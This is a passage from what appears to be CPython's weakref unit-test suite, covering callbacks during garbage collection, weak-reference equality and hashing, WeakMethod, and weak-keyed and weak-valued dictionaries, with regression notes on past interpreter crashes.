# __mro__), so no segfault occurs. Instead it got:
# test_callback_in_cycle_2 (__main__.ReferencesTestCase) ...
# Exception exceptions.AttributeError:
# "II instance has no attribute 'J'" in <bound method II.acallback
# of <?.II instance at 0x00B9B4B8>> ignored
class J(object):
pass
class II:
def acallback(self, ignore):
self.J
I = II()
I.J = J
I.wr = weakref.ref(J, I.acallback)
del I, J, II
gc.collect()
def test_callback_in_cycle_3(self):
import gc
# This one broke the first patch that fixed the last two. In this
# case, the objects reachable from the callback aren't also reachable
# from the object (c1) *triggering* the callback: you can get to
# c1 from c2, but not vice-versa. The result was that c2's __dict__
# got tp_clear'ed by the time the c2.cb callback got invoked.
class C:
def cb(self, ignore):
self.me
self.c1
self.wr
c1, c2 = C(), C()
c2.me = c2
c2.c1 = c1
c2.wr = weakref.ref(c1, c2.cb)
del c1, c2
gc.collect()
def test_callback_in_cycle_4(self):
import gc
# Like test_callback_in_cycle_3, except c2 and c1 have different
# classes. c2's class (C) isn't reachable from c1 then, so protecting
# objects reachable from the dying object (c1) isn't enough to stop
# c2's class (C) from getting tp_clear'ed before c2.cb is invoked.
# The result was a segfault (C.__mro__ was NULL when the callback
# tried to look up self.me).
class C(object):
def cb(self, ignore):
self.me
self.c1
self.wr
class D:
pass
c1, c2 = D(), C()
c2.me = c2
c2.c1 = c1
c2.wr = weakref.ref(c1, c2.cb)
del c1, c2, C, D
gc.collect()
@support.requires_type_collecting
def test_callback_in_cycle_resurrection(self):
import gc
# Do something nasty in a weakref callback: resurrect objects
# from dead cycles. For this to be attempted, the weakref and
# its callback must also be part of the cyclic trash (else the
# objects reachable via the callback couldn't be in cyclic trash
# to begin with -- the callback would act like an external root).
# But gc clears trash weakrefs with callbacks early now, which
# disables the callbacks, so the callbacks shouldn't get called
# at all (and so nothing actually gets resurrected).
alist = []
class C(object):
def __init__(self, value):
self.attribute = value
def acallback(self, ignore):
alist.append(self.c)
c1, c2 = C(1), C(2)
c1.c = c2
c2.c = c1
c1.wr = weakref.ref(c2, c1.acallback)
c2.wr = weakref.ref(c1, c2.acallback)
def C_went_away(ignore):
alist.append("C went away")
wr = weakref.ref(C, C_went_away)
del c1, c2, C # make them all trash
self.assertEqual(alist, []) # del isn't enough to reclaim anything
gc.collect()
# c1.wr and c2.wr were part of the cyclic trash, so should have
# been cleared without their callbacks executing. OTOH, the weakref
# to C is bound to a function local (wr), and wasn't trash, so that
# callback should have been invoked when C went away.
self.assertEqual(alist, ["C went away"])
# The remaining weakref should be dead now (its callback ran).
self.assertEqual(wr(), None)
del alist[:]
gc.collect()
self.assertEqual(alist, [])
def test_callbacks_on_callback(self):
import gc
# Set up weakref callbacks *on* weakref callbacks.
alist = []
def safe_callback(ignore):
alist.append("safe_callback called")
class C(object):
def cb(self, ignore):
alist.append("cb called")
c, d = C(), C()
c.other = d
d.other = c
callback = c.cb
c.wr = weakref.ref(d, callback) # this won't trigger
d.wr = weakref.ref(callback, d.cb) # ditto
external_wr = weakref.ref(callback, safe_callback) # but this will
self.assertIs(external_wr(), callback)
# The weakrefs attached to c and d should get cleared, so that
# C.cb is never called. But external_wr isn't part of the cyclic
# trash, and no cyclic trash is reachable from it, so safe_callback
# should get invoked when the bound method object callback (c.cb)
# -- which is itself a callback, and also part of the cyclic trash --
# gets reclaimed at the end of gc.
del callback, c, d, C
self.assertEqual(alist, []) # del isn't enough to clean up cycles
gc.collect()
self.assertEqual(alist, ["safe_callback called"])
self.assertEqual(external_wr(), None)
del alist[:]
gc.collect()
self.assertEqual(alist, [])
def test_gc_during_ref_creation(self):
self.check_gc_during_creation(weakref.ref)
def test_gc_during_proxy_creation(self):
self.check_gc_during_creation(weakref.proxy)
def check_gc_during_creation(self, makeref):
thresholds = gc.get_threshold()
gc.set_threshold(1, 1, 1)
gc.collect()
class A:
pass
def callback(*args):
pass
referenced = A()
a = A()
a.a = a
a.wr = makeref(referenced)
try:
# now make sure the object and the ref get labeled as
# cyclic trash:
a = A()
weakref.ref(referenced, callback)
finally:
gc.set_threshold(*thresholds)
def test_ref_created_during_del(self):
# Bug #1377858
# A weakref created in an object's __del__() would crash the
# interpreter when the weakref was cleaned up since it would refer to
# non-existent memory. This test should not segfault the interpreter.
class Target(object):
def __del__(self):
global ref_from_del
ref_from_del = weakref.ref(self)
w = Target()
def test_init(self):
# Issue 3634
# <weakref to class>.__init__() doesn't check errors correctly
r = weakref.ref(Exception)
self.assertRaises(TypeError, r.__init__, 0, 0, 0, 0, 0)
# No exception should be raised here
gc.collect()
def test_classes(self):
# Check that classes are weakrefable.
class A(object):
pass
l = []
weakref.ref(int)
a = weakref.ref(A, l.append)
A = None
gc.collect()
self.assertEqual(a(), None)
self.assertEqual(l, [a])
def test_equality(self):
# Alive weakrefs defer equality testing to their underlying object.
x = Object(1)
y = Object(1)
z = Object(2)
a = weakref.ref(x)
b = weakref.ref(y)
c = weakref.ref(z)
d = weakref.ref(x)
# Note how we directly test the operators here, to stress both
# __eq__ and __ne__.
self.assertTrue(a == b)
self.assertFalse(a != b)
self.assertFalse(a == c)
self.assertTrue(a != c)
self.assertTrue(a == d)
self.assertFalse(a != d)
self.assertFalse(a == x)
self.assertTrue(a != x)
self.assertTrue(a == ALWAYS_EQ)
self.assertFalse(a != ALWAYS_EQ)
del x, y, z
gc.collect()
for r in a, b, c:
# Sanity check
self.assertIs(r(), None)
# Dead weakrefs compare by identity: whether `a` and `d` are the
# same weakref object is an implementation detail, since they pointed
# to the same original object and didn't have a callback.
# (see issue #16453).
self.assertFalse(a == b)
self.assertTrue(a != b)
self.assertFalse(a == c)
self.assertTrue(a != c)
self.assertEqual(a == d, a is d)
self.assertEqual(a != d, a is not d)
def test_ordering(self):
# weakrefs cannot be ordered, even if the underlying objects can.
ops = [operator.lt, operator.gt, operator.le, operator.ge]
x = Object(1)
y = Object(1)
a = weakref.ref(x)
b = weakref.ref(y)
for op in ops:
self.assertRaises(TypeError, op, a, b)
# Same when dead.
del x, y
gc.collect()
for op in ops:
self.assertRaises(TypeError, op, a, b)
def test_hashing(self):
# Alive weakrefs hash the same as the underlying object
x = Object(42)
y = Object(42)
a = weakref.ref(x)
b = weakref.ref(y)
self.assertEqual(hash(a), hash(42))
del x, y
gc.collect()
# Dead weakrefs:
# - retain their hash is they were hashed when alive;
# - otherwise, cannot be hashed.
self.assertEqual(hash(a), hash(42))
self.assertRaises(TypeError, hash, b)
def test_trashcan_16602(self):
# Issue #16602: when a weakref's target was part of a long
# deallocation chain, the trashcan mechanism could delay clearing
# of the weakref and make the target object visible from outside
# code even though its refcount had dropped to 0. A crash ensued.
class C:
def __init__(self, parent):
if not parent:
return
wself = weakref.ref(self)
def cb(wparent):
o = wself()
self.wparent = weakref.ref(parent, cb)
d = weakref.WeakKeyDictionary()
root = c = C(None)
for n in range(100):
d[c] = c = C(c)
del root
gc.collect()
def test_callback_attribute(self):
x = Object(1)
callback = lambda ref: None
ref1 = weakref.ref(x, callback)
self.assertIs(ref1.__callback__, callback)
ref2 = weakref.ref(x)
self.assertIsNone(ref2.__callback__)
def test_callback_attribute_after_deletion(self):
x = Object(1)
ref = weakref.ref(x, self.callback)
self.assertIsNotNone(ref.__callback__)
del x
support.gc_collect()
self.assertIsNone(ref.__callback__)
def test_set_callback_attribute(self):
x = Object(1)
callback = lambda ref: None
ref1 = weakref.ref(x, callback)
with self.assertRaises(AttributeError):
ref1.__callback__ = lambda ref: None
def test_callback_gcs(self):
class ObjectWithDel(Object):
def __del__(self): pass
x = ObjectWithDel(1)
ref1 = weakref.ref(x, lambda ref: support.gc_collect())
del x
support.gc_collect()
class SubclassableWeakrefTestCase(TestBase):
def test_subclass_refs(self):
class MyRef(weakref.ref):
def __init__(self, ob, callback=None, value=42):
self.value = value
super().__init__(ob, callback)
def __call__(self):
self.called = True
return super().__call__()
o = Object("foo")
mr = MyRef(o, value=24)
self.assertIs(mr(), o)
self.assertTrue(mr.called)
self.assertEqual(mr.value, 24)
del o
self.assertIsNone(mr())
self.assertTrue(mr.called)
def test_subclass_refs_dont_replace_standard_refs(self):
class MyRef(weakref.ref):
pass
o = Object(42)
r1 = MyRef(o)
r2 = weakref.ref(o)
self.assertIsNot(r1, r2)
self.assertEqual(weakref.getweakrefs(o), [r2, r1])
self.assertEqual(weakref.getweakrefcount(o), 2)
r3 = MyRef(o)
self.assertEqual(weakref.getweakrefcount(o), 3)
refs = weakref.getweakrefs(o)
self.assertEqual(len(refs), 3)
self.assertIs(r2, refs[0])
self.assertIn(r1, refs[1:])
self.assertIn(r3, refs[1:])
def test_subclass_refs_dont_conflate_callbacks(self):
class MyRef(weakref.ref):
pass
o = Object(42)
r1 = MyRef(o, id)
r2 = MyRef(o, str)
self.assertIsNot(r1, r2)
refs = weakref.getweakrefs(o)
self.assertIn(r1, refs)
self.assertIn(r2, refs)
def test_subclass_refs_with_slots(self):
class MyRef(weakref.ref):
__slots__ = "slot1", "slot2"
def __new__(type, ob, callback, slot1, slot2):
return weakref.ref.__new__(type, ob, callback)
def __init__(self, ob, callback, slot1, slot2):
self.slot1 = slot1
self.slot2 = slot2
def meth(self):
return self.slot1 + self.slot2
o = Object(42)
r = MyRef(o, None, "abc", "def")
self.assertEqual(r.slot1, "abc")
self.assertEqual(r.slot2, "def")
self.assertEqual(r.meth(), "abcdef")
self.assertFalse(hasattr(r, "__dict__"))
def test_subclass_refs_with_cycle(self):
"""Confirm https://bugs.python.org/issue3100 is fixed."""
# An instance of a weakref subclass can have attributes.
# If such a weakref holds the only strong reference to the object,
# deleting the weakref will delete the object. In this case,
# the callback must not be called, because the ref object is
# being deleted.
class MyRef(weakref.ref):
pass
# Use a local callback, for "regrtest -R::"
# to detect refcounting problems
def callback(w):
self.cbcalled += 1
o = C()
r1 = MyRef(o, callback)
r1.o = o
del o
del r1 # Used to crash here
self.assertEqual(self.cbcalled, 0)
# Same test, with two weakrefs to the same object
# (since code paths are different)
o = C()
r1 = MyRef(o, callback)
r2 = MyRef(o, callback)
r1.r = r2
r2.o = o
del o
del r2
del r1 # Used to crash here
self.assertEqual(self.cbcalled, 0)
class WeakMethodTestCase(unittest.TestCase):
def _subclass(self):
"""Return an Object subclass overriding `some_method`."""
class C(Object):
def some_method(self):
return 6
return C
def test_alive(self):
o = Object(1)
r = weakref.WeakMethod(o.some_method)
self.assertIsInstance(r, weakref.ReferenceType)
self.assertIsInstance(r(), type(o.some_method))
self.assertIs(r().__self__, o)
self.assertIs(r().__func__, o.some_method.__func__)
self.assertEqual(r()(), 4)
def test_object_dead(self):
o = Object(1)
r = weakref.WeakMethod(o.some_method)
del o
gc.collect()
self.assertIs(r(), None)
def test_method_dead(self):
C = self._subclass()
o = C(1)
r = weakref.WeakMethod(o.some_method)
del C.some_method
gc.collect()
self.assertIs(r(), None)
def test_callback_when_object_dead(self):
# Test callback behaviour when object dies first.
C = self._subclass()
calls = []
def cb(arg):
calls.append(arg)
o = C(1)
r = weakref.WeakMethod(o.some_method, cb)
del o
gc.collect()
self.assertEqual(calls, [r])
# Callback is only called once.
C.some_method = Object.some_method
gc.collect()
self.assertEqual(calls, [r])
def test_callback_when_method_dead(self):
# Test callback behaviour when method dies first.
C = self._subclass()
calls = []
def cb(arg):
calls.append(arg)
o = C(1)
r = weakref.WeakMethod(o.some_method, cb)
del C.some_method
gc.collect()
self.assertEqual(calls, [r])
# Callback is only called once.
del o
gc.collect()
self.assertEqual(calls, [r])
@support.cpython_only
def test_no_cycles(self):
# A WeakMethod doesn't create any reference cycle to itself.
o = Object(1)
def cb(_):
pass
r = weakref.WeakMethod(o.some_method, cb)
wr = weakref.ref(r)
del r
self.assertIs(wr(), None)
def test_equality(self):
def _eq(a, b):
self.assertTrue(a == b)
self.assertFalse(a != b)
def _ne(a, b):
self.assertTrue(a != b)
self.assertFalse(a == b)
x = Object(1)
y = Object(1)
a = weakref.WeakMethod(x.some_method)
b = weakref.WeakMethod(y.some_method)
c = weakref.WeakMethod(x.other_method)
d = weakref.WeakMethod(y.other_method)
# Objects equal, same method
_eq(a, b)
_eq(c, d)
# Objects equal, different method
_ne(a, c)
_ne(a, d)
_ne(b, c)
_ne(b, d)
# Objects unequal, same or different method
z = Object(2)
e = weakref.WeakMethod(z.some_method)
f = weakref.WeakMethod(z.other_method)
_ne(a, e)
_ne(a, f)
_ne(b, e)
_ne(b, f)
# Compare with different types
_ne(a, x.some_method)
_eq(a, ALWAYS_EQ)
del x, y, z
gc.collect()
# Dead WeakMethods compare by identity
refs = a, b, c, d, e, f
for q in refs:
for r in refs:
self.assertEqual(q == r, q is r)
self.assertEqual(q != r, q is not r)
def test_hashing(self):
# Alive WeakMethods are hashable if the underlying object is
# hashable.
x = Object(1)
y = Object(1)
a = weakref.WeakMethod(x.some_method)
b = weakref.WeakMethod(y.some_method)
c = weakref.WeakMethod(y.other_method)
# Since WeakMethod objects are equal, the hashes should be equal.
self.assertEqual(hash(a), hash(b))
ha = hash(a)
# Dead WeakMethods retain their old hash value
del x, y
gc.collect()
self.assertEqual(hash(a), ha)
self.assertEqual(hash(b), ha)
# If it wasn't hashed when alive, a dead WeakMethod cannot be hashed.
self.assertRaises(TypeError, hash, c)
class MappingTestCase(TestBase):
COUNT = 10
def check_len_cycles(self, dict_type, cons):
N = 20
items = [RefCycle() for i in range(N)]
dct = dict_type(cons(o) for o in items)
# Keep an iterator alive
it = dct.items()
try:
next(it)
except StopIteration:
pass
del items
gc.collect()
n1 = len(dct)
del it
gc.collect()
n2 = len(dct)
# one item may be kept alive inside the iterator
self.assertIn(n1, (0, 1))
self.assertEqual(n2, 0)
def test_weak_keyed_len_cycles(self):
self.check_len_cycles(weakref.WeakKeyDictionary, lambda k: (k, 1))
def test_weak_valued_len_cycles(self):
self.check_len_cycles(weakref.WeakValueDictionary, lambda k: (1, k))
def check_len_race(self, dict_type, cons):
# Extended sanity checks for len() in the face of cyclic collection
self.addCleanup(gc.set_threshold, *gc.get_threshold())
for th in range(1, 100):
N = 20
gc.collect(0)
gc.set_threshold(th, th, th)
items = [RefCycle() for i in range(N)]
dct = dict_type(cons(o) for o in items)
del items
# All items will be collected at next garbage collection pass
it = dct.items()
try:
next(it)
except StopIteration:
pass
n1 = len(dct)
del it
n2 = len(dct)
self.assertGreaterEqual(n1, 0)
self.assertLessEqual(n1, N)
self.assertGreaterEqual(n2, 0)
self.assertLessEqual(n2, n1)
def test_weak_keyed_len_race(self):
self.check_len_race(weakref.WeakKeyDictionary, lambda k: (k, 1))
def test_weak_valued_len_race(self):
self.check_len_race(weakref.WeakValueDictionary, lambda k: (1, k))
def test_weak_values(self):
#
# This exercises d.copy(), d.items(), d[], del d[], len(d).
#
dict, objects = self.make_weak_valued_dict()
for o in objects:
self.assertEqual(weakref.getweakrefcount(o), 1)
self.assertIs(o, dict[o.arg],
"wrong object returned by weak dict!")
items1 = list(dict.items())
items2 = list(dict.copy().items())
items1.sort()
items2.sort()
self.assertEqual(items1, items2,
"cloning of weak-valued dictionary did not work!")
del items1, items2
self.assertEqual(len(dict), self.COUNT)
del objects[0]
self.assertEqual(len(dict), self.COUNT - 1,
"deleting object did not cause dictionary update")
del objects, o
self.assertEqual(len(dict), 0,
"deleting the values did not clear the dictionary")
# regression on SF bug #447152:
dict = weakref.WeakValueDictionary()
self.assertRaises(KeyError, dict.__getitem__, 1)
dict[2] = C()
self.assertRaises(KeyError, dict.__getitem__, 2)
def test_weak_keys(self):
#
# This exercises d.copy(), d.items(), d[] = v, d[], del d[],
# len(d), k in d.
#
dict, objects = self.make_weak_keyed_dict()
for o in objects:
self.assertEqual(weakref.getweakrefcount(o), 1,
"wrong number of weak references to %r!" % o)
self.assertIs(o.arg, dict[o],
"wrong object returned by weak dict!")
items1 = dict.items()
items2 = dict.copy().items()
self.assertEqual(set(items1), set(items2),
"cloning of weak-keyed dictionary did not work!")
del items1, items2
self.assertEqual(len(dict), self.COUNT)
del objects[0]
self.assertEqual(len(dict), (self.COUNT - 1),
"deleting object did not cause dictionary update")
del objects, o
self.assertEqual(len(dict), 0,
"deleting the keys did not clear the dictionary")
o = Object(42)
dict[o] = "What is the meaning of the universe?"
self.assertIn(o, dict)
self.assertNotIn(34, dict)
def test_weak_keyed_iters(self):
dict, objects = self.make_weak_keyed_dict()
self.check_iters(dict)
# Test keyrefs()
refs = dict.keyrefs()
self.assertEqual(len(refs), len(objects))
objects2 = list(objects)
for wr in refs:
ob = wr()
self.assertIn(ob, dict)
self.assertIn(ob, dict)
self.assertEqual(ob.arg, dict[ob])
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
# Test iterkeyrefs()
objects2 = list(objects)
self.assertEqual(len(list(dict.keyrefs())), len(objects))
for wr in dict.keyrefs():
ob = wr()
self.assertIn(ob, dict)
self.assertIn(ob, dict)
self.assertEqual(ob.arg, dict[ob])
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
def test_weak_valued_iters(self):
dict, objects = self.make_weak_valued_dict()
self.check_iters(dict)
# Test valuerefs()
refs = dict.valuerefs()
self.assertEqual(len(refs), len(objects))
objects2 = list(objects)
for wr in refs:
ob = wr()
self.assertEqual(ob, dict[ob.arg])
self.assertEqual(ob.arg, dict[ob.arg].arg)
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
# Test itervaluerefs()
objects2 = list(objects)
self.assertEqual(len(list(dict.itervaluerefs())), len(objects))
for wr in dict.itervaluerefs():
ob = wr()
self.assertEqual(ob, dict[ob.arg])
self.assertEqual(ob.arg, dict[ob.arg].arg)
objects2.remove(ob)
self.assertEqual(len(objects2), 0)
def check_iters(self, dict):
# item iterator:
items = list(dict.items())
for item in dict.items():
items.remove(item)
self.assertFalse(items, "items() did not touch all items")
# key iterator, via __iter__():
keys = list(dict.keys())
for k in dict:
keys.remove(k)
self.assertFalse(keys, "__iter__() did not touch all keys")
# key iterator, via iterkeys():
keys = list(dict.keys())
for k in dict.keys():
keys.remove(k)
self.assertFalse(keys, "iterkeys() did not touch all keys")
# value iterator:
values = list(dict.values())
for v in dict.values():
values.remove(v)
self.assertFalse(values,
"itervalues() did not touch all values")
def check_weak_destroy_while_iterating(self, dict, objects, iter_name):
n = len(dict)
it = iter(getattr(dict, iter_name)())
next(it) # Trigger internal iteration
# Destroy an object
del objects[-1]
gc.collect() # just in case
# We have removed either the first consumed object, or another one
self.assertIn(len(list(it)), [len(objects), len(objects) - 1])
del it
# The removal has been committed
self.assertEqual(len(dict), n - 1)
def check_weak_destroy_and_mutate_while_iterating(self, dict, testcontext):
# Check that we can explicitly mutate the weak dict without
# interfering with delayed removal.
# `testcontext` should create an iterator, destroy one of the
# weakref'ed objects and then return a new key/value pair corresponding
# to the destroyed object.
with testcontext() as (k, v):
self.assertNotIn(k, dict)
with testcontext() as (k, v):
self.assertRaises(KeyError, dict.__delitem__, k)
self.assertNotIn(k, dict)
with testcontext() as (k, v):
self.assertRaises(KeyError, dict.pop, k)
self.assertNotIn(k, dict)
with testcontext() as (k, v):
dict[k] = v
self.assertEqual(dict[k], v)
ddict = copy.copy(dict)
with testcontext() as (k, v):
dict.update(ddict)
self.assertEqual(dict, ddict)
with testcontext() as (k, v):
dict.clear()
self.assertEqual(len(dict), 0)
def check_weak_del_and_len_while_iterating(self, dict, testcontext):
# Check that len() works when both iterating and removing keys
# explicitly through various means (.pop(), .clear()...), while
# implicit mutation is deferred because an iterator is alive.
# (each call to testcontext() should schedule one item for removal
# for this test to work properly)
o = Object(123456)
with testcontext():
n = len(dict)
# Since underlaying dict is ordered, first item is popped
dict.pop(next(dict.keys()))
self.assertEqual(len(dict), n - 1)
dict[o] = o
self.assertEqual(len(dict), n)
# last item in objects is removed from dict in context shutdown
with testcontext():
self.assertEqual(len(dict), n - 1)
# Then, (o, o) is popped
dict.popitem()
self.assertEqual(len(dict), n - 2)
with testcontext():
self.assertEqual(len(dict), n - 3)
del dict[next(dict.keys())]
self.assertEqual(len(dict), n - 4)
with testcontext():
self.assertEqual(len(dict), n - 5)
dict.popitem()
self.assertEqual(len(dict), n - 6)
with testcontext():
dict.clear()
self.assertEqual(len(dict), 0)
self.assertEqual(len(dict), 0)
def test_weak_keys_destroy_while_iterating(self):
# Issue #7105: iterators shouldn't crash when a key is implicitly removed
dict, objects = self.make_weak_keyed_dict()
self.check_weak_destroy_while_iterating(dict, objects, 'keys')
self.check_weak_destroy_while_iterating(dict, objects, 'items')
self.check_weak_destroy_while_iterating(dict, objects, 'values')
self.check_weak_destroy_while_iterating(dict, objects, 'keyrefs')
dict, objects = self.make_weak_keyed_dict()
@contextlib.contextmanager
def testcontext():
try:
it = iter(dict.items())
next(it)
# Schedule a key/value for removal and recreate it
v = objects.pop().arg
gc.collect() # just in case
yield Object(v), v
finally:
it = None # should commit all removals
gc.collect()
self.check_weak_destroy_and_mutate_while_iterating(dict, testcontext)
# Issue #21173: len() fragile when keys are both implicitly and
# explicitly removed.
dict, objects = self.make_weak_keyed_dict()
self.check_weak_del_and_len_while_iterating(dict, testcontext)
def test_weak_values_destroy_while_iterating(self):
# Issue #7105: iterators shouldn't crash when a key is implicitly removed
dict, objects = self.make_weak_valued_dict()
self.check_weak_destroy_while_iterating(dict, objects, 'keys')
self.check_weak_destroy_while_iterating(dict, objects, 'items')
self.check_weak_destroy_while_iterating(dict, objects, 'values')
self.check_weak_destroy_while_iterating(dict, objects, 'itervaluerefs')
self.check_weak_destroy_while_iterating(dict, objects, 'valuerefs')
dict, objects = self.make_weak_valued_dict()
@contextlib.contextmanager
def testcontext():
try:
it = iter(dict.items())
next(it)
# Schedule a key/value for removal and recreate it
k = objects.pop().arg
gc.collect() # just in case
yield k, Object(k)
finally:
it = None # should commit all removals
gc.collect()
self.check_weak_destroy_and_mutate_while_iterating(dict, testcontext)
dict, objects = self.make_weak_valued_dict()
self.check_weak_del_and_len_while_iterating(dict, testcontext)
def test_make_weak_keyed_dict_from_dict(self):
o = Object(3)
dict = weakref.WeakKeyDictionary({o:364})
self.assertEqual(dict[o], 364)
def test_make_weak_keyed_dict_from_weak_keyed_dict(self):
o = Object(3)
dict = weakref.WeakKeyDictionary({o:364})
dict2 = weakref.WeakKeyDictionary(dict)
self.assertEqual(dict[o], 364)
def make_weak_keyed_dict(self):
dict = weakref.WeakKeyDictionary()
objects = list(map(Object, range(self.COUNT)))
for o in objects:
dict[o] = o.arg
return dict, objects
def test_make_weak_valued_dict_from_dict(self):
o = Object(3)
dict = weakref.WeakValueDictionary({364:o})
self.assertEqual(dict[364], o)
def test_make_weak_valued_dict_from_weak_valued_dict(self):
o = Object(3)
dict = weakref.WeakValueDictionary({364:o})
dict2 = weakref.WeakValueDictionary(dict)
self.assertEqual(dict[364], o)
def test_make_weak_valued_dict_misc(self):
# errors
self.assertRaises(TypeError, weakref.WeakValueDictionary.__init__)
self.assertRaises(TypeError, weakref.WeakValueDictionary, {}, {})
self.assertRaises(TypeError, weakref.WeakValueDictionary, (), ())
# special keyword arguments
o = Object(3)
for kw in 'self', 'dict', 'other', 'iterable':
d = weakref.WeakValueDictionary(**{kw: o})
self.assertEqual(list(d.keys()), [kw])
self.assertEqual(d[kw], o)
def make_weak_valued_dict(self):
dict = weakref.WeakValueDictionary()
objects = list(map(Object, range(self.COUNT)))
for o in objects:
dict[o.arg] = o
return dict, objects
def check_popitem(self, klass, key1, value1, key2, value2):
weakdict = klass()
weakdict[key1] = value1
weakdict[key2] = value2
self.assertEqual(len(weakdict), 2)
k, v = weakdict.popitem()
self.assertEqual(len(weakdict), 1)
if k is key1:
self.assertIs(v, value1)
else:
self.assertIs(v, value2)
k, v = weakdict.popitem()
self.assertEqual(len(weakdict), 0)
if k is key1:
self.assertIs(v, value1)
else:
self.assertIs(v, value2)
def test_weak_valued_dict_popitem(self):
self.check_popitem(weakref.WeakValueDictionary,
"key1", C(), "key2", C())
def test_weak_keyed_dict_popitem(self):
self.check_popitem(weakref.WeakKeyDictionary,
C(), "value 1", C(), "value 2")
def check_setdefault(self, klass, key, value1, value2):
self.assertIsNot(value1, value2,
"invalid test"
" -- value parameters must be distinct objects")
weakdict = klass()
o = weakdict.setdefault(key, value1)
self.assertIs(o, value1)
self.assertIn(key, weakdict)
self.assertIs(weakdict.get(key), value1)
self.assertIs(weakdict[key], value1)
o = weakdict.setdefault(key, value2)
self.assertIs(o, value1)
self.assertIn(key, weakdict)
self.assertIs(weakdict.get(key), value1)
self.assertIs(weakdict[key], value1)
def test_weak_valued_dict_setdefault(self):
self.check_setdefault(weakref.WeakValueDictionary,
"key", C(), C())
def test_weak_keyed_dict_setdefault(self):
self.check_setdefault(weakref.WeakKeyDictionary,
C(), "value 1", "value 2")
def check_update(self, klass, dict):
#
# This exercises d.update(), len(d), d.keys(), k in d,
# d.get(), d[].
#
weakdict = klass()
weakdict.update(dict)
self.assertEqual(len(weakdict), len(dict))
for k in weakdict.keys():
self.assertIn(k, dict, "mysterious new key appeared in weak dict")
v = dict.get(k)
self.assertIs(v, weakdict[k])
self.assertIs(v, weakdict.get(k))
for k in dict.keys():
self.assertIn(k, weakdict, "original key disappeared in weak dict")
v = dict[k]
self.assertIs(v, weakdict[k])
self.assertIs(v, weakdict.get(k))
def test_weak_valued_dict_update(self):
self.check_update(weakref.WeakValueDictionary,
{1: C(), 'a': C(), C(): C()})
# errors
self.assertRaises(TypeError, weakref.WeakValueDictionary.update)
d = weakref.WeakValueDictionary()
self.assertRaises(TypeError, d.update, {}, {})
self.assertRaises(TypeError, d.update, (), ())
self.assertEqual(list(d.keys()), [])
# special keyword arguments
o = Object(3)
for kw in 'self', 'dict', 'other', 'iterable':
d = weakref.WeakValueDictionary()
d.update(**{kw: o})
self.assertEqual(list(d.keys()), [kw])
self.assertEqual(d[kw], o)
def test_weak_keyed_dict_update(self):
self.check_update(weakref.WeakKeyDictionary,
{C(): 1, C(): 2, C(): 3})
def test_weak_keyed_delitem(self):
d = weakref.WeakKeyDictionary()
o1 = Object('1')
o2 = Object('2')
d[o1] = 'something'
d[o2] = 'something'
self.assertEqual(len(d), 2)
del d[o1]
self.assertEqual(len(d), 1)
self.assertEqual(list(d.keys()), [o2])
def test_weak_valued_delitem(self):
d = weakref.WeakValueDictionary()
o1 = Object('1')
o2 = Object('2')
d['something'] = o1
d['something else'] = o2
self.assertEqual(len(d), 2)
del d['something']
self.assertEqual(len(d), 1)
self.assertEqual(list(d.items()), [('something else', o2)])
def test_weak_keyed_bad_delitem(self):
d = weakref.WeakKeyDictionary()
o = Object('1')
# An attempt to delete an object that isn't there should raise
# KeyError. It didn't before 2.3.
self.assertRaises(KeyError, d.__delitem__, o)
self.assertRaises(KeyError, d.__getitem__, o)
# If a key isn't of a weakly referencable type, __getitem__ and
# __setitem__ raise TypeError. __delitem__ should too.
self.assertRaises(TypeError, d.__delitem__, 13)
self.assertRaises(TypeError, d.__getitem__, 13)
self.assertRaises(TypeError, d.__setitem__, 13, 13)
def test_weak_keyed_cascading_deletes(self):
# SF bug 742860. For some reason, before 2.3 __delitem__ iterated
# over the keys via self.data.iterkeys(). If things vanished from
# the dict during this (or got added), that caused a RuntimeError.
d = weakref.WeakKeyDictionary()
mutate = False
class C(object):
def __init__(self, i):
self.value = i
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
if mutate:
# Side effect that mutates the dict, by removing the
# last strong reference to a key.
del objs[-1]
return self.value == other.value
objs = [C(i) for i in range(4)]
for o in objs:
d[o] = o.value
del o # now the only strong references to keys are in objs
# Find the order in which iterkeys sees the keys.
objs = list(d.keys())
# Reverse it, so that the iteration implementation of __delitem__
# has to keep looping to find the first object we delete.
objs.reverse()
# Turn on mutation in C.__eq__. The first time through the loop,
# under the iterkeys() business the first comparison will delete
# the last item iterkeys() would see, and that causes a
# RuntimeError: dictionary changed size during iteration
# when the iterkeys() loop goes around to try comparing the next
# key. After this was fixed, it just deletes the last object *our*
# "for o in obj" loop would have gotten to.
mutate = True
count = 0
for o in objs:
count += 1
del d[o]
self.assertEqual(len(d), 0)
self.assertEqual(count, 2)
def test_make_weak_valued_dict_repr(self):
dict = weakref.WeakValueDictionary()
self.assertRegex(repr(dict), '<WeakValueDictionary at 0x.*>')
def test_make_weak_keyed_dict_repr(self):
dict = weakref.WeakKeyDictionary()
self.assertRegex(repr(dict), '<WeakKeyDictionary at 0x.*>')
def test_threaded_weak_valued_setdefault(self):
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(100000):
x = d.setdefault(10, RefCycle())
self.assertIsNot(x, None) # we never put None in there!
del x
def test_threaded_weak_valued_pop(self):
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(100000):
d[10] = RefCycle()
x = d.pop(10, 10)
self.assertIsNot(x, None) # we never put None in there!
def test_threaded_weak_valued_consistency(self):
# Issue #28427: old keys should not remove new values from
# WeakValueDictionary when collecting from another thread.
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(200000):
o = RefCycle()
d[10] = o
# o is still alive, so the dict can't be empty
self.assertEqual(len(d), 1)
o = None # lose ref
def check_threaded_weak_dict_copy(self, type_, deepcopy):
# `type_` should be either WeakKeyDictionary or WeakValueDictionary.
# `deepcopy` should be either True or False.
exc = []
class DummyKey:
def __init__(self, ctr):
self.ctr = ctr
class DummyValue:
def __init__(self, ctr):
self.ctr = ctr
def dict_copy(d, exc):
try:
if deepcopy is True:
_ = copy.deepcopy(d)
else:
_ = d.copy()
except Exception as ex:
exc.append(ex)
def pop_and_collect(lst):
gc_ctr = 0
while lst:
i = random.randint(0, len(lst) - 1)
gc_ctr += 1
lst.pop(i)
if gc_ctr % 10000 == 0:
gc.collect() # just in case
self.assertIn(type_, (weakref.WeakKeyDictionary, weakref.WeakValueDictionary))
d = type_()
keys = []
values = []
# Initialize d with many entries
for i in range(70000):
k, v = DummyKey(i), DummyValue(i)
keys.append(k)
values.append(v)
